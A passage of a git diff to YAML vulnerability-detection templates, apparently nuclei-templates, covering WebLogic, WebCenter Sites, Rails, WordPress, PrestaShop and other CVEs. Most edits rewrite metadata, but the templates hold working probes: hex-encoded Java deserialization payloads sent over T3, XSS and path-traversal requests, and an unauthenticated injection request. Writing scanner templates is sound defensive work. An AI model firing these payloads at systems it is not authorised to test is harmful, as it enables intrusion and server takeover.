that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)." + tags: cve,cve2018,oracle,weblogic,network,deserialization network: - inputs: @@ -21,10 +26,14 @@ network: read: 1024 - data: "{{hex_decode('000003ad056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707729000a556e69636173745265660000000005a2000000005649e3fd00000000000000000000000000000078fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff')}}" read: 1024 + host: - "{{Hostname}}" + read-size: 1024 matchers: - type: regex regex: - "\\$Proxy[0-9]+" + +# Enhanced by mp on 2022/04/14 diff --git a/cves/2018/CVE-2018-2791.yaml b/cves/2018/CVE-2018-2791.yaml index 3b9ac98e97..0d0071f34e 100644 --- a/cves/2018/CVE-2018-2791.yaml +++ b/cves/2018/CVE-2018-2791.yaml @@ -1,20 +1,24 @@ id: CVE-2018-2791 info: - name: Oracle WebCenter Sites Multiple XSS + name: Oracle Fusion Middleware WebCenter Sites - Cross-Site Scripting author: madrobot,leovalcante severity: high - description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N - cvss-score: 8.20 - cve-id: CVE-2018-2791 + description: The Oracle WebCenter Sites component of Oracle Fusion Middleware is susceptible to multiple instances of cross-site scripting that could allow unauthenticated attackers with network access via HTTP + to compromise Oracle WebCenter Sites. Impacted versions that are affected are 11.1.1.8.0, 12.2.1.2.0 and 12.2.1.3.0. Successful attacks require human interaction from a person other than the attacker and while + the vulnerability is in Oracle WebCenter Sites, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access + to all Oracle WebCenter Sites accessible data as well as unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data. reference: - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html - http://www.securitytracker.com/id/1040695 - http://www.securityfocus.com/bid/103800 - https://www.exploit-db.com/exploits/44752/ - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites + - https://nvd.nist.gov/vuln/detail/CVE-2018-2791 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N + cvss-score: 8.2 + cve-id: CVE-2018-2791 tags: cve,cve2018,oracle,xss,wcs requests: @@ -40,4 +44,6 @@ requests: words: - '' - 'Missing translation key' - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/04/20 diff --git a/cves/2018/CVE-2018-2893.yaml b/cves/2018/CVE-2018-2893.yaml index f87d6e3fa4..e7ba463a2a 100644 --- a/cves/2018/CVE-2018-2893.yaml +++ b/cves/2018/CVE-2018-2893.yaml @@ -1,19 +1,25 @@ id: CVE-2018-2893 info: - name: Oracle WebLogic Server Deserialization RCE (CVE-2018-2893) + name: Oracle WebLogic Server - Remote Code Execution author: milo2012 severity: critical - tags: cve,cve2018,weblogic,network - reference: https://www.anquanke.com/post/id/152164, https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL + description: | + The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server. + reference: + - https://www.anquanke.com/post/id/152164 + - https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL + - https://nvd.nist.gov/vuln/detail/CVE-2018-2893 + - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-2893 - description: "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)." + tags: cve,cve2018,weblogic,network,deserialization,rce,oracle network: - inputs: + - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" read: 1024 - data: "000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd60000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461863d1d0000000078" @@ -25,10 +31,14 @@ network: - data: "0000042e056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000001251e200000000000000100000118aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e310000f1440000000046911fd80000000000000000000000000000007878fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff" type: hex read: 1024 + host: - "{{Hostname}}" + matchers: - type: word part: raw words: - "StreamMessageImpl cannot be cast to weblogic" + +# Enhanced by mp on 2022/04/14 diff --git a/cves/2018/CVE-2018-2894.yaml b/cves/2018/CVE-2018-2894.yaml index c5c306ce1f..06c12a5593 100644 --- a/cves/2018/CVE-2018-2894.yaml +++ b/cves/2018/CVE-2018-2894.yaml @@ -1,18 +1,21 @@ id: CVE-2018-2894 info: - name: Oracle WebLogic RCE + name: Oracle WebLogic Server - Remote Code Execution author: geeknik,pdteam - description: Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. severity: critical - tags: cve,cve2018,oracle,weblogic,rce - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2018-2894 + description: | + The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web Services) is susceptible to a remote code execution vulnerability that is easily exploitable and could allow unauthenticated attackers with network access via HTTP to compromise the server. Supported versions that are affected are 12.1.3.0, 12.2.1.2 and 12.2.1.3. reference: - https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/ - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2018-2894 + - https://nvd.nist.gov/vuln/detail/CVE-2018-2894 + - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-2894 + tags: cve,cve2018,oracle,weblogic,rce requests: - raw: @@ -90,3 +93,5 @@ requests: - type: word words: - "26ec00a3a03f6bfc5226fd121567bb58" # MD5 (CVE-2018-2894) + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-3167.yaml b/cves/2018/CVE-2018-3167.yaml index 45ba1789ea..ce3dce57f2 100644 --- a/cves/2018/CVE-2018-3167.yaml +++ b/cves/2018/CVE-2018-3167.yaml @@ -5,15 +5,15 @@ info: author: geeknik severity: medium description: https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145 - tags: cve,cve2018,oracle,ebs,ssrf - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 - cve-id: CVE-2018-3167 reference: - http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html - http://www.securitytracker.com/id/1041897 - http://www.securityfocus.com/bid/105627 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2018-3167 + tags: cve,cve2018,oracle,ebs,ssrf,blind requests: - method: POST diff --git a/cves/2018/CVE-2018-3238.yaml b/cves/2018/CVE-2018-3238.yaml index 6ac30f80d6..e8738fc6b3 100644 --- a/cves/2018/CVE-2018-3238.yaml +++ b/cves/2018/CVE-2018-3238.yaml @@ -1,19 +1,20 @@ id: CVE-2018-3238 info: - name: Multiple XSS Oracle WebCenter Sites + name: Oracle Fusion Middleware WebCenter Sites 11.1.1.8.0 - Cross-Site Scripting author: leovalcante severity: medium - description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 11.1.1.8.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebCenter Sites. + description: The Oracle WebCenter Sites 11.1.1.8.0 component of Oracle Fusion Middleware is impacted by easily exploitable cross-site scripting vulnerabilities that allow high privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. reference: - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites + - https://www.oracle.com/security-alerts/cpuoct2018.html - https://nvd.nist.gov/vuln/detail/CVE-2018-3238 - tags: cve,cve2018,oracle,wcs,xss + - http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N - cvss-score: 6.90 + cvss-score: 6.9 cve-id: CVE-2018-3238 - + tags: cve,cve2018,oracle,wcs,xss requests: - raw: @@ -42,4 +43,6 @@ requests: words: - '' - 'Variables.cs_imagedir' - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/04/20 diff --git a/cves/2018/CVE-2018-3714.yaml b/cves/2018/CVE-2018-3714.yaml index e44ca7a0b5..50093afd70 100644 --- a/cves/2018/CVE-2018-3714.yaml +++ b/cves/2018/CVE-2018-3714.yaml @@ -1,16 +1,18 @@ id: CVE-2018-3714 + info: name: node-srv Path Traversal author: madrobot severity: medium - reference: https://hackerone.com/reports/309124 - tags: cve,cve2018,nodejs,lfi + description: node-srv node module suffers from a Path Traversal vulnerability due to lack of validation of url, which allows a malicious user to read content of any file with known path. + reference: + - https://hackerone.com/reports/309124 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.50 + cvss-score: 6.5 cve-id: CVE-2018-3714 cwe-id: CWE-22 - description: "node-srv node module suffers from a Path Traversal vulnerability due to lack of validation of url, which allows a malicious user to read content of any file with known path." + tags: cve,cve2018,nodejs,lfi requests: - method: GET diff --git a/cves/2018/CVE-2018-3760.yaml b/cves/2018/CVE-2018-3760.yaml index 221891cb15..d4508b7285 100644 --- a/cves/2018/CVE-2018-3760.yaml +++ b/cves/2018/CVE-2018-3760.yaml @@ -4,20 +4,20 @@ info: name: Ruby On Rails Path Traversal author: 0xrudra,pikpikcu severity: high + description: | + Ruby On Rails is a well-known Ruby Web development framework, which uses Sprockets as a static file server in development environment. Sprockets is a Ruby library that compiles and distributes static resource files. + There is a path traversal vulnerability caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server. reference: - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2018-3760 - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf - https://seclists.org/oss-sec/2018/q2/210 - https://xz.aliyun.com/t/2542 - description: | - Ruby On Rails is a well-known Ruby Web development framework, which uses Sprockets as a static file server in development environment. Sprockets is a Ruby library that compiles and distributes static resource files. - There is a path traversal vulnerability caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server. - tags: cve,cve2018,rails,lfi classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2018-3760 cwe-id: CWE-200 + tags: cve,cve2018,rails,lfi,ruby requests: - raw: @@ -41,7 +41,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2018/CVE-2018-3810.yaml b/cves/2018/CVE-2018-3810.yaml index d7c71edf22..0527d91a3c 100644 --- a/cves/2018/CVE-2018-3810.yaml +++ b/cves/2018/CVE-2018-3810.yaml @@ -1,17 +1,21 @@ id: CVE-2018-3810 info: - name: WordPress Smart Google Code Inserter Authentication Bypass + name: Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass author: princechaddha severity: critical - reference: https://www.exploit-db.com/exploits/43420 - tags: wordpress,cve,cve2018 + description: Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code. + reference: + - https://www.exploit-db.com/exploits/43420 + - https://nvd.nist.gov/vuln/detail/CVE-2018-3810 + - https://wordpress.org/plugins/smart-google-code-inserter/#developers + - https://limbenjamin.com/articles/smart-google-code-inserter-auth-bypass.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-3810 cwe-id: CWE-287 - description: "Authentication Bypass vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code." + tags: wordpress,cve,cve2018,google requests: - method: POST @@ -40,4 +44,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-5230.yaml b/cves/2018/CVE-2018-5230.yaml index 3073e580b5..ec997e4f28 100644 --- a/cves/2018/CVE-2018-5230.yaml +++ b/cves/2018/CVE-2018-5230.yaml @@ -4,26 +4,38 @@ info: name: Atlassian Confluence Status-List XSS author: madrobot severity: medium - tags: cve,cve2018,atlassian,confluence,xss - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2018-5230 - cwe-id: CWE-79 - description: "The issue collector in Atlassian Jira before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4 and from version 7.9.0 before version 7.9.2 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the error message of custom fields when an invalid value is specified." + description: | + The issue collector in Atlassian Jira before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4 and from version 7.9.0 before version 7.9.2 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the error message of custom fields when an invalid value is specified. reference: - https://jira.atlassian.com/browse/JRASERVER-67289 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-5230 + cwe-id: CWE-79 + metadata: + shodan-query: http.component:"Atlassian Confluence" + tags: cve,cve2018,atlassian,confluence,xss requests: - method: GET path: - - "{{BaseURL}}/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm" + - "{{BaseURL}}/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm" + matchers-condition: and matchers: - type: status status: - 200 + - type: word - words: - - "SRC=\"javascript:alert(1337)\">" part: body + words: + - '" + - "adsf/js/" + condition: and \ No newline at end of file diff --git a/cves/2021/CVE-2021-37538.yaml b/cves/2021/CVE-2021-37538.yaml index c7327b670e..39ca5a1721 100644 --- a/cves/2021/CVE-2021-37538.yaml +++ b/cves/2021/CVE-2021-37538.yaml @@ -1,19 +1,20 @@ id: CVE-2021-37538 info: - name: PrestaShop SmartBlog SQL Injection + name: PrestaShop SmartBlog <4.0.6- SQL Injection author: whoever severity: critical - description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection in the blog archive functionality. - tags: cve,cve2021,prestashop,smartblog,sqli + description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality. reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37538 - https://blog.sorcery.ie/posts/smartblog_sqli/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-37538 + - https://classydevs.com/free-modules/smartblog/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2021-37538 cwe-id: CWE-89 + tags: cve,cve2021,prestashop,smartblog,sqli requests: - method: GET @@ -30,3 +31,5 @@ requests: words: - "c5fe25896e49ddfe996db7508cf00534" part: body + +# Enhanced by mp on 2022/05/02 diff --git a/cves/2021/CVE-2021-37573.yaml b/cves/2021/CVE-2021-37573.yaml index aa50dba941..6d291320a1 100644 --- a/cves/2021/CVE-2021-37573.yaml +++ b/cves/2021/CVE-2021-37573.yaml @@ -1,18 +1,21 @@ id: CVE-2021-37573 info: - name: Tiny Java Web Server - Reflected XSS + name: Tiny Java Web Server - Reflected Cross-Site Scripting author: geeknik severity: medium + description: A reflected cross-site scripting vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) <=1.115 allows an adversary to inject malicious code on the server's "404 Page not Found" error page. reference: - https://seclists.org/fulldisclosure/2021/Aug/13 - tags: cve,cve2021,xss,tjws + - https://nvd.nist.gov/vuln/detail/CVE-2021-37573 + - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-042.txt + - http://seclists.org/fulldisclosure/2021/Aug/13 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-37573 cwe-id: CWE-79 - description: "A reflected cross-site scripting (XSS) vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) <=1.115 allows an adversary to inject malicious code on the server's \"404 Page not Found\" error page" + tags: cve,cve2021,xss,tjws,java requests: - method: GET @@ -34,3 +37,5 @@ requests: part: header words: - text/html + +# Enhanced by mp on 2022/03/30 diff --git a/cves/2021/CVE-2021-37580.yaml b/cves/2021/CVE-2021-37580.yaml index ec923d692f..93830671c7 100644 --- a/cves/2021/CVE-2021-37580.yaml +++ b/cves/2021/CVE-2021-37580.yaml @@ -1,19 +1,21 @@ id: CVE-2021-37580 info: - name: Apache ShenYu Admin JWT authentication bypass + name: Apache ShenYu Admin JWT - Authentication Bypass author: pdteam severity: critical - description: A flaw was found in Apache ShenYu Admin. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication. This issue affected Apache ShenYu 2.3.0 and 2.4.0 + description: Apache ShenYu 2.3.0 and 2.4.0 allow Admin access without proper authentication. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-37580 - https://github.com/fengwenhua/CVE-2021-37580 - tags: cve,cve2021,apache,jwt,shenyu + - https://lists.apache.org/thread/o15j25qwtpcw62k48xw1tnv48skh3zgb + - http://www.openwall.com/lists/oss-security/2021/11/16/1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2021-37580 cwe-id: CWE-287 + tags: cve,cve2021,apache,jwt,shenyu requests: - raw: @@ -33,4 +35,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/05/02 diff --git a/cves/2021/CVE-2021-37704.yaml b/cves/2021/CVE-2021-37704.yaml index cefb540971..b5147f128a 100644 --- a/cves/2021/CVE-2021-37704.yaml +++ b/cves/2021/CVE-2021-37704.yaml @@ -1,19 +1,21 @@ id: CVE-2021-37704 info: - name: phpfastcache phpinfo exposure + name: phpinfo Resource Exposure author: whoever severity: medium - description: phpinfo() exposure in unprotected composer vendor folder via phpfastcache/phpfastcache. - tags: cve,cve2021,exposure,phpfastcache + description: phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache. reference: - https://github.com/PHPSocialNetwork/phpfastcache/pull/813 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704 + - https://github.com/PHPSocialNetwork/phpfastcache/pull/813 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704 + - https://github.com/PHPSocialNetwork/phpfastcache/security/advisories/GHSA-cvh5-p6r6-g2qc + - https://packagist.org/packages/phpfastcache/phpfastcache + - https://github.com/PHPSocialNetwork/phpfastcache/blob/master/CHANGELOG.md#807 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N - cvss-score: 4.30 + cvss-score: 4.3 cve-id: CVE-2021-37704 cwe-id: CWE-668 + tags: cve,cve2021,exposure,phpfastcache,phpinfo requests: - method: GET @@ -39,3 +41,5 @@ requests: group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' + +# Enhanced by mp on 2022/03/30 diff --git a/cves/2021/CVE-2021-37833.yaml b/cves/2021/CVE-2021-37833.yaml index 74f7def049..f76398eeb8 100644 --- a/cves/2021/CVE-2021-37833.yaml +++ b/cves/2021/CVE-2021-37833.yaml @@ -8,12 +8,13 @@ info: reference: - https://github.com/dievus/CVE-2021-37833 - https://nvd.nist.gov/vuln/detail/CVE-2021-37833 - tags: cve,cve2021,hoteldruid,xss + - https://www.hoteldruid.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-37833 cwe-id: CWE-79 + tags: cve,cve2021,hoteldruid,xss requests: - method: GET diff --git a/cves/2021/CVE-2021-38314.yaml b/cves/2021/CVE-2021-38314.yaml index bb427aec4f..9f1a2d8b75 100644 --- a/cves/2021/CVE-2021-38314.yaml +++ b/cves/2021/CVE-2021-38314.yaml @@ -4,16 +4,19 @@ info: name: Redux Framework - Unauthenticated Sensitive Information Disclosure author: meme-lord severity: medium + description: The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` + that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known + salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site's `AUTH_KEY` concatenated with the + `SECURE_AUTH_KEY`. reference: - https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/ - https://wahaz.medium.com/unauthenticated-sensitive-information-disclosure-at-redacted-2702224098c - https://blog.sorcery.ie/posts/redux_wordpress/ - tags: cve,cve2021,wordpress,wp-plugin classification: cvss-metrics: 